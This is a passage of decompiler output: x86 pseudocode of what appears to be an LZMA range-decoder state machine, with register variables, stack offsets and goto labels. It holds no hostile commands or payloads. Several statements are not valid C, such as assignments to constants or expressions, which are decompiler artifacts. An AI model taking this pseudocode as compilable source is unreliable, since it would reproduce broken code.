                                                                                    							}
                                                                                    							goto L24;
                                                                                    						case 4:
                                                                                    							goto L133;
                                                                                    						case 5:
                                                                                    							goto L137;
                                                                                    						case 6:
                                                                                    							__edx = 0;
                                                                                    							__eflags =  *(__ebp - 0x40);
                                                                                    							if( *(__ebp - 0x40) != 0) {
                                                                                    								__eax =  *(__ebp - 4);
                                                                                    								__ecx =  *(__ebp - 0x38);
                                                                                    								 *(__ebp - 0x34) = 1;
                                                                                    								 *(__ebp - 0x84) = 7;
                                                                                    								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                    								goto L132;
                                                                                    							}
                                                                                    							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                    							__esi =  *(__ebp - 0x60);
                                                                                    							__cl = 8;
                                                                                    							__cl = 8 -  *(__ebp - 0x3c);
                                                                                    							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                    							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                    							__ecx =  *(__ebp - 0x3c);
                                                                                    							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                    							__ecx =  *(__ebp - 4);
                                                                                    							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                    							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                    							__eflags =  *(__ebp - 0x38) - 4;
                                                                                    							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                    							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                    							if( *(__ebp - 0x38) >= 4) {
                                                                                    								__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                    								if( *(__ebp - 0x38) >= 0xa) {
                                                                                    									_t98 = __ebp - 0x38;
                                                                                    									 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                    									__eflags =  *_t98;
                                                                                    								} else {
                                                                                    									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                    								}
                                                                                    							} else {
                                                                                    								 *(__ebp - 0x38) = 0;
                                                                                    							}
                                                                                    							__eflags =  *(__ebp - 0x34) - __edx;
                                                                                    							if( *(__ebp - 0x34) == __edx) {
                                                                                    								__ebx = 0;
                                                                                    								__ebx = 1;
                                                                                    								goto L61;
                                                                                    							} else {
                                                                                    								__eax =  *(__ebp - 0x14);
                                                                                    								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                    								__eflags = __eax -  *(__ebp - 0x74);
                                                                                    								if(__eax >=  *(__ebp - 0x74)) {
                                                                                    									__eax = __eax +  *(__ebp - 0x74);
                                                                                    									__eflags = __eax;
                                                                                    								}
                                                                                    								__ecx =  *(__ebp - 8);
                                                                                    								__ebx = 0;
                                                                                    								__ebx = 1;
                                                                                    								__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                    								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                    								goto L41;
                                                                                    							}
                                                                                    						case 7:
                                                                                    							__eflags =  *(__ebp - 0x40) - 1;
                                                                                    							if( *(__ebp - 0x40) != 1) {
                                                                                    								__eax =  *(__ebp - 0x24);
                                                                                    								 *(__ebp - 0x80) = 0x16;
                                                                                    								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                    								__eax =  *(__ebp - 0x28);
                                                                                    								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                    								__eax =  *(__ebp - 0x2c);
                                                                                    								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                    								__eax = 0;
                                                                                    								__eflags =  *(__ebp - 0x38) - 7;
                                                                                    								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                    								__al = __al & 0x000000fd;
                                                                                    								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                    								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                    								__eax =  *(__ebp - 4);
                                                                                    								__eax =  *(__ebp - 4) + 0x664;
                                                                                    								__eflags = __eax;
                                                                                    								 *(__ebp - 0x58) = __eax;
                                                                                    								goto L69;
                                                                                    							}
                                                                                    							__eax =  *(__ebp - 4);
                                                                                    							__ecx =  *(__ebp - 0x38);
                                                                                    							 *(__ebp - 0x84) = 8;
                                                                                    							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                    							goto L132;
                                                                                    						case 8:
                                                                                    							__eflags =  *(__ebp - 0x40);
                                                                                    							if( *(__ebp - 0x40) != 0) {
                                                                                    								__eax =  *(__ebp - 4);
                                                                                    								__ecx =  *(__ebp - 0x38);
                                                                                    								 *(__ebp - 0x84) = 0xa;
                                                                                    								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                    							} else {
                                                                                    								__eax =  *(__ebp - 0x38);
                                                                                    								__ecx =  *(__ebp - 4);
                                                                                    								__eax =  *(__ebp - 0x38) + 0xf;
                                                                                    								 *(__ebp - 0x84) = 9;
                                                                                    								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                    								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                    							}
                                                                                    							goto L132;
                                                                                    						case 9:
                                                                                    							goto L0;
                                                                                    						case 0xa:
                                                                                    							__eflags =  *(__ebp - 0x40);
                                                                                    							if( *(__ebp - 0x40) != 0) {
                                                                                    								__eax =  *(__ebp - 4);
                                                                                    								__ecx =  *(__ebp - 0x38);
                                                                                    								 *(__ebp - 0x84) = 0xb;
                                                                                    								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                    								goto L132;
                                                                                    							}
                                                                                    							__eax =  *(__ebp - 0x28);
                                                                                    							goto L88;
                                                                                    						case 0xb:
                                                                                    							__eflags =  *(__ebp - 0x40);
                                                                                    							if( *(__ebp - 0x40) != 0) {
                                                                                    								__ecx =  *(__ebp - 0x24);
                                                                                    								__eax =  *(__ebp - 0x20);
                                                                                    								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                    							} else {
                                                                                    								__eax =  *(__ebp - 0x24);
                                                                                    							}
                                                                                    							__ecx =  *(__ebp - 0x28);
                                                                                    							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                    							L88:
                                                                                    							__ecx =  *(__ebp - 0x2c);
                                                                                    							 *(__ebp - 0x2c) = __eax;
                                                                                    							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                    							goto L89;
                                                                                    						case 0xc:
                                                                                    							L99:
                                                                                    							__eflags =  *(__ebp - 0x6c);
                                                                                    							if( *(__ebp - 0x6c) == 0) {
                                                                                    								 *(__ebp - 0x88) = 0xc;
                                                                                    								goto L170;
                                                                                    							}
                                                                                    							__ecx =  *(__ebp - 0x70);
                                                                                    							__eax =  *(__ebp - 0xc);
                                                                                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    							_t334 = __ebp - 0x70;
                                                                                    							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                    							__eflags =  *_t334;
                                                                                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    							__eax =  *(__ebp - 0x2c);
                                                                                    							goto L101;
                                                                                    						case 0xd:
                                                                                    							L37:
                                                                                    							__eflags =  *(__ebp - 0x6c);
                                                                                    							if( *(__ebp - 0x6c) == 0) {
                                                                                    								 *(__ebp - 0x88) = 0xd;
                                                                                    								goto L170;
                                                                                    							}
                                                                                    							__ecx =  *(__ebp - 0x70);
                                                                                    							__eax =  *(__ebp - 0xc);
                                                                                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    							_t122 = __ebp - 0x70;
                                                                                    							 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                    							__eflags =  *_t122;
                                                                                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    							L39:
                                                                                    							__eax =  *(__ebp - 0x40);
                                                                                    							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                    							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                    								goto L48;
                                                                                    							}
                                                                                    							__eflags = __ebx - 0x100;
                                                                                    							if(__ebx >= 0x100) {
                                                                                    								goto L54;
                                                                                    							}
                                                                                    							L41:
                                                                                    							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                    							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                    							__ecx =  *(__ebp - 0x58);
                                                                                    							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                    							 *(__ebp - 0x48) = __eax;
                                                                                    							__eax = __eax + 1;
                                                                                    							__eax = __eax << 8;
                                                                                    							__eax = __eax + __ebx;
                                                                                    							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                    							__ax =  *__esi;
                                                                                    							 *(__ebp - 0x54) = __esi;
                                                                                    							__edx = __ax & 0x0000ffff;
                                                                                    							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                    							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                    							if( *(__ebp - 0xc) >= __ecx) {
                                                                                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                    								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                    								__cx = __ax;
                                                                                    								 *(__ebp - 0x40) = 1;
                                                                                    								__cx = __ax >> 5;
                                                                                    								__eflags = __eax;
                                                                                    								__ebx = __ebx + __ebx + 1;
                                                                                    								 *__esi = __ax;
                                                                                    							} else {
                                                                                    								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                    								 *(__ebp - 0x10) = __ecx;
                                                                                    								0x800 = 0x800 - __edx;
                                                                                    								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                    								__ebx = __ebx + __ebx;
                                                                                    								 *__esi = __cx;
                                                                                    							}
                                                                                    							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    							 *(__ebp - 0x44) = __ebx;
                                                                                    							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    								goto L39;
                                                                                    							} else {
                                                                                    								goto L37;
                                                                                    							}
                                                                                    						case 0xe:
                                                                                    							L46:
                                                                                    							__eflags =  *(__ebp - 0x6c);
                                                                                    							if( *(__ebp - 0x6c) == 0) {
                                                                                    								 *(__ebp - 0x88) = 0xe;
                                                                                    								goto L170;
                                                                                    							}
                                                                                    							__ecx =  *(__ebp - 0x70);
                                                                                    							__eax =  *(__ebp - 0xc);
                                                                                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    							_t156 = __ebp - 0x70;
                                                                                    							 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                    							__eflags =  *_t156;
                                                                                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    							while(1) {
                                                                                    								L48:
                                                                                    								__eflags = __ebx - 0x100;
                                                                                    								if(__ebx >= 0x100) {
                                                                                    									break;
                                                                                    								}
                                                                                    								__eax =  *(__ebp - 0x58);
                                                                                    								__edx = __ebx + __ebx;
                                                                                    								__ecx =  *(__ebp - 0x10);
                                                                                    								__esi = __edx + __eax;
                                                                                    								__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                    								__ax =  *__esi;
                                                                                    								 *(__ebp - 0x54) = __esi;
                                                                                    								__edi = __ax & 0x0000ffff;
                                                                                    								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                    								__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                    								if( *(__ebp - 0xc) >= __ecx) {
                                                                                    									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                    									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                    									__cx = __ax;
                                                                                    									_t170 = __edx + 1; // 0x1
                                                                                    									__ebx = _t170;
                                                                                    									__cx = __ax >> 5;
                                                                                    									__eflags = __eax;
                                                                                    									 *__esi = __ax;
                                                                                    								} else {
                                                                                    									 *(__ebp - 0x10) = __ecx;
                                                                                    									0x800 = 0x800 - __edi;
                                                                                    									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                    									__ebx = __ebx + __ebx;
                                                                                    									 *__esi = __cx;
                                                                                    								}
                                                                                    								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    								 *(__ebp - 0x44) = __ebx;
                                                                                    								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    									continue;
                                                                                    								} else {
                                                                                    									goto L46;
                                                                                    								}
                                                                                    							}
                                                                                    							L54:
                                                                                    							_t173 = __ebp - 0x34;
                                                                                    							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                    							__eflags =  *_t173;
                                                                                    							goto L55;
                                                                                    						case 0xf:
                                                                                    							L58:
                                                                                    							__eflags =  *(__ebp - 0x6c);
                                                                                    							if( *(__ebp - 0x6c) == 0) {
                                                                                    								 *(__ebp - 0x88) = 0xf;
                                                                                    								goto L170;
                                                                                    							}
                                                                                    							__ecx =  *(__ebp - 0x70);
                                                                                    							__eax =  *(__ebp - 0xc);
                                                                                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    							_t203 = __ebp - 0x70;
                                                                                    							 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                    							__eflags =  *_t203;
                                                                                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    							L60:
                                                                                    							__eflags = __ebx - 0x100;
                                                                                    							if(__ebx >= 0x100) {
                                                                                    								L55:
                                                                                    								__al =  *(__ebp - 0x44);
                                                                                    								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                    								goto L56;
                                                                                    							}
                                                                                    							L61:
                                                                                    							__eax =  *(__ebp - 0x58);
                                                                                    							__edx = __ebx + __ebx;
                                                                                    							__ecx =  *(__ebp - 0x10);
                                                                                    							__esi = __edx + __eax;
                                                                                    							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                    							__ax =  *__esi;
                                                                                    							 *(__ebp - 0x54) = __esi;
                                                                                    							__edi = __ax & 0x0000ffff;
                                                                                    							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                    							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                    							if( *(__ebp - 0xc) >= __ecx) {
                                                                                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                    								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                    								__cx = __ax;
                                                                                    								_t217 = __edx + 1; // 0x1
                                                                                    								__ebx = _t217;
                                                                                    								__cx = __ax >> 5;
                                                                                    								__eflags = __eax;
                                                                                    								 *__esi = __ax;
                                                                                    							} else {
                                                                                    								 *(__ebp - 0x10) = __ecx;
                                                                                    								0x800 = 0x800 - __edi;
                                                                                    								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                    								__ebx = __ebx + __ebx;
                                                                                    								 *__esi = __cx;
                                                                                    							}
                                                                                    							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    							 *(__ebp - 0x44) = __ebx;
                                                                                    							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    								goto L60;
                                                                                    							} else {
                                                                                    								goto L58;
                                                                                    							}
                                                                                    						case 0x10:
                                                                                    							L109:
                                                                                    							__eflags =  *(__ebp - 0x6c);
                                                                                    							if( *(__ebp - 0x6c) == 0) {
                                                                                    								 *(__ebp - 0x88) = 0x10;
                                                                                    								goto L170;
                                                                                    							}
                                                                                    							__ecx =  *(__ebp - 0x70);
                                                                                    							__eax =  *(__ebp - 0xc);
                                                                                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    							_t365 = __ebp - 0x70;
                                                                                    							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                    							__eflags =  *_t365;
                                                                                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    							goto L111;
                                                                                    						case 0x11:
                                                                                    							goto L69;
                                                                                    						case 0x12:
                                                                                    							__eflags =  *(__ebp - 0x40);
                                                                                    							if( *(__ebp - 0x40) != 0) {
                                                                                    								__eax =  *(__ebp - 0x58);
                                                                                    								 *(__ebp - 0x84) = 0x13;
                                                                                    								__esi =  *(__ebp - 0x58) + 2;
                                                                                    								goto L132;
                                                                                    							}
                                                                                    							__eax =  *(__ebp - 0x4c);
                                                                                    							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                    							__ecx =  *(__ebp - 0x58);
                                                                                    							__eax =  *(__ebp - 0x4c) << 4;
                                                                                    							__eflags = __eax;
                                                                                    							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                    							goto L130;
                                                                                    						case 0x13:
                                                                                    							__eflags =  *(__ebp - 0x40);
                                                                                    							if( *(__ebp - 0x40) != 0) {
                                                                                    								_t469 = __ebp - 0x58;
                                                                                    								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                    								__eflags =  *_t469;
                                                                                    								 *(__ebp - 0x30) = 0x10;
                                                                                    								 *(__ebp - 0x40) = 8;
                                                                                    								L144:
                                                                                    								 *(__ebp - 0x7c) = 0x14;
                                                                                    								goto L145;
                                                                                    							}
                                                                                    							__eax =  *(__ebp - 0x4c);
                                                                                    							__ecx =  *(__ebp - 0x58);
                                                                                    							__eax =  *(__ebp - 0x4c) << 4;
                                                                                    							 *(__ebp - 0x30) = 8;
                                                                                    							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                    							L130:
                                                                                    							 *(__ebp - 0x58) = __eax;
                                                                                    							 *(__ebp - 0x40) = 3;
                                                                                    							goto L144;
                                                                                    						case 0x14:
                                                                                    							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                    							__eax =  *(__ebp - 0x80);
                                                                                    							goto L140;
                                                                                    						case 0x15:
                                                                                    							__eax = 0;
                                                                                    							__eflags =  *(__ebp - 0x38) - 7;
                                                                                    							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                    							__al = __al & 0x000000fd;
                                                                                    							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                    							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                    							goto L120;
                                                                                    						case 0x16:
                                                                                    							__eax =  *(__ebp - 0x30);
                                                                                    							__eflags = __eax - 4;
                                                                                    							if(__eax >= 4) {
                                                                                    								_push(3);
                                                                                    								_pop(__eax);
                                                                                    							}
                                                                                    							__ecx =  *(__ebp - 4);
                                                                                    							 *(__ebp - 0x40) = 6;
                                                                                    							__eax = __eax << 7;
                                                                                    							 *(__ebp - 0x7c) = 0x19;
                                                                                    							 *(__ebp - 0x58) = __eax;
                                                                                    							goto L145;
                                                                                    						case 0x17:
                                                                                    							L145:
                                                                                    							__eax =  *(__ebp - 0x40);
                                                                                    							 *(__ebp - 0x50) = 1;
                                                                                    							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                    							goto L149;
                                                                                    						case 0x18:
                                                                                    							L146:
                                                                                    							__eflags =  *(__ebp - 0x6c);
                                                                                    							if( *(__ebp - 0x6c) == 0) {
                                                                                    								 *(__ebp - 0x88) = 0x18;
                                                                                    								goto L170;
                                                                                    							}
                                                                                    							__ecx =  *(__ebp - 0x70);
                                                                                    							__eax =  *(__ebp - 0xc);
                                                                                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    							_t484 = __ebp - 0x70;
                                                                                    							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                    							__eflags =  *_t484;
                                                                                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    							L148:
                                                                                    							_t487 = __ebp - 0x48;
                                                                                    							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                    							__eflags =  *_t487;
                                                                                    							L149:
                                                                                    							__eflags =  *(__ebp - 0x48);
                                                                                    							if( *(__ebp - 0x48) <= 0) {
                                                                                    								__ecx =  *(__ebp - 0x40);
                                                                                    								__ebx =  *(__ebp - 0x50);
                                                                                    								0 = 1;
                                                                                    								__eax = 1 << __cl;
                                                                                    								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                    								__eax =  *(__ebp - 0x7c);
                                                                                    								 *(__ebp - 0x44) = __ebx;
                                                                                    								goto L140;
                                                                                    							}
                                                                                    							__eax =  *(__ebp - 0x50);
                                                                                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                    							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                    							__eax =  *(__ebp - 0x58);
                                                                                    							__esi = __edx + __eax;
                                                                                    							 *(__ebp - 0x54) = __esi;
                                                                                    							__ax =  *__esi;
                                                                                    							__edi = __ax & 0x0000ffff;
                                                                                    							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                    							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                    							if( *(__ebp - 0xc) >= __ecx) {
                                                                                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                    								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                    								__cx = __ax;
                                                                                    								__cx = __ax >> 5;
                                                                                    								__eax = __eax - __ecx;
                                                                                    								__edx = __edx + 1;
                                                                                    								__eflags = __edx;
                                                                                    								 *__esi = __ax;
                                                                                    								 *(__ebp - 0x50) = __edx;
                                                                                    							} else {
                                                                                    								 *(__ebp - 0x10) = __ecx;
                                                                                    								0x800 = 0x800 - __edi;
                                                                                    								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                    								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                    								 *__esi = __cx;
                                                                                    							}
                                                                                    							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    								goto L148;
                                                                                    							} else {
                                                                                    								goto L146;
                                                                                    							}
                                                                                    						case 0x19:
                                                                                    							__eflags = __ebx - 4;
                                                                                    							if(__ebx < 4) {
                                                                                    								 *(__ebp - 0x2c) = __ebx;
                                                                                    								L119:
                                                                                    								_t393 = __ebp - 0x2c;
                                                                                    								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                    								__eflags =  *_t393;
                                                                                    								L120:
                                                                                    								__eax =  *(__ebp - 0x2c);
                                                                                    								__eflags = __eax;
                                                                                    								if(__eax == 0) {
                                                                                    									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                    									goto L170;
                                                                                    								}
                                                                                    								__eflags = __eax -  *(__ebp - 0x60);
                                                                                    								if(__eax >  *(__ebp - 0x60)) {
                                                                                    									goto L171;
                                                                                    								}
                                                                                    								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                    								__eax =  *(__ebp - 0x30);
                                                                                    								_t400 = __ebp - 0x60;
                                                                                    								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                    								__eflags =  *_t400;
                                                                                    								goto L123;
                                                                                    							}
                                                                                    							__ecx = __ebx;
                                                                                    							__eax = __ebx;
                                                                                    							__ecx = __ebx >> 1;
                                                                                    							__eax = __ebx & 0x00000001;
                                                                                    							__ecx = (__ebx >> 1) - 1;
                                                                                    							__al = __al | 0x00000002;
                                                                                    							__eax = (__ebx & 0x00000001) << __cl;
                                                                                    							__eflags = __ebx - 0xe;
                                                                                    							 *(__ebp - 0x2c) = __eax;
                                                                                    							if(__ebx >= 0xe) {
                                                                                    								__ebx = 0;
                                                                                    								 *(__ebp - 0x48) = __ecx;
                                                                                    								L102:
                                                                                    								__eflags =  *(__ebp - 0x48);
                                                                                    								if( *(__ebp - 0x48) <= 0) {
                                                                                    									__eax = __eax + __ebx;
                                                                                    									 *(__ebp - 0x40) = 4;
                                                                                    									 *(__ebp - 0x2c) = __eax;
                                                                                    									__eax =  *(__ebp - 4);
                                                                                    									__eax =  *(__ebp - 4) + 0x644;
                                                                                    									__eflags = __eax;
                                                                                    									L108:
                                                                                    									__ebx = 0;
                                                                                    									 *(__ebp - 0x58) = __eax;
                                                                                    									 *(__ebp - 0x50) = 1;
                                                                                    									 *(__ebp - 0x44) = 0;
                                                                                    									 *(__ebp - 0x48) = 0;
                                                                                    									L112:
                                                                                    									__eax =  *(__ebp - 0x40);
                                                                                    									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                    									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                    										_t391 = __ebp - 0x2c;
                                                                                    										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                    										__eflags =  *_t391;
                                                                                    										goto L119;
                                                                                    									}
                                                                                    									__eax =  *(__ebp - 0x50);
                                                                                    									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                    									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                    									__eax =  *(__ebp - 0x58);
                                                                                    									__esi = __edi + __eax;
                                                                                    									 *(__ebp - 0x54) = __esi;
                                                                                    									__ax =  *__esi;
                                                                                    									__ecx = __ax & 0x0000ffff;
                                                                                    									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                    									__eflags =  *(__ebp - 0xc) - __edx;
                                                                                    									if( *(__ebp - 0xc) >= __edx) {
                                                                                    										__ecx = 0;
                                                                                    										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                    										__ecx = 1;
                                                                                    										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                    										__ebx = 1;
                                                                                    										__ecx =  *(__ebp - 0x48);
                                                                                    										__ebx = 1 << __cl;
                                                                                    										__ecx = 1 << __cl;
                                                                                    										__ebx =  *(__ebp - 0x44);
                                                                                    										__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                    										__cx = __ax;
                                                                                    										__cx = __ax >> 5;
                                                                                    										__eax = __eax - __ecx;
                                                                                    										__edi = __edi + 1;
                                                                                    										__eflags = __edi;
                                                                                    										 *(__ebp - 0x44) = __ebx;
                                                                                    										 *__esi = __ax;
                                                                                    										 *(__ebp - 0x50) = __edi;
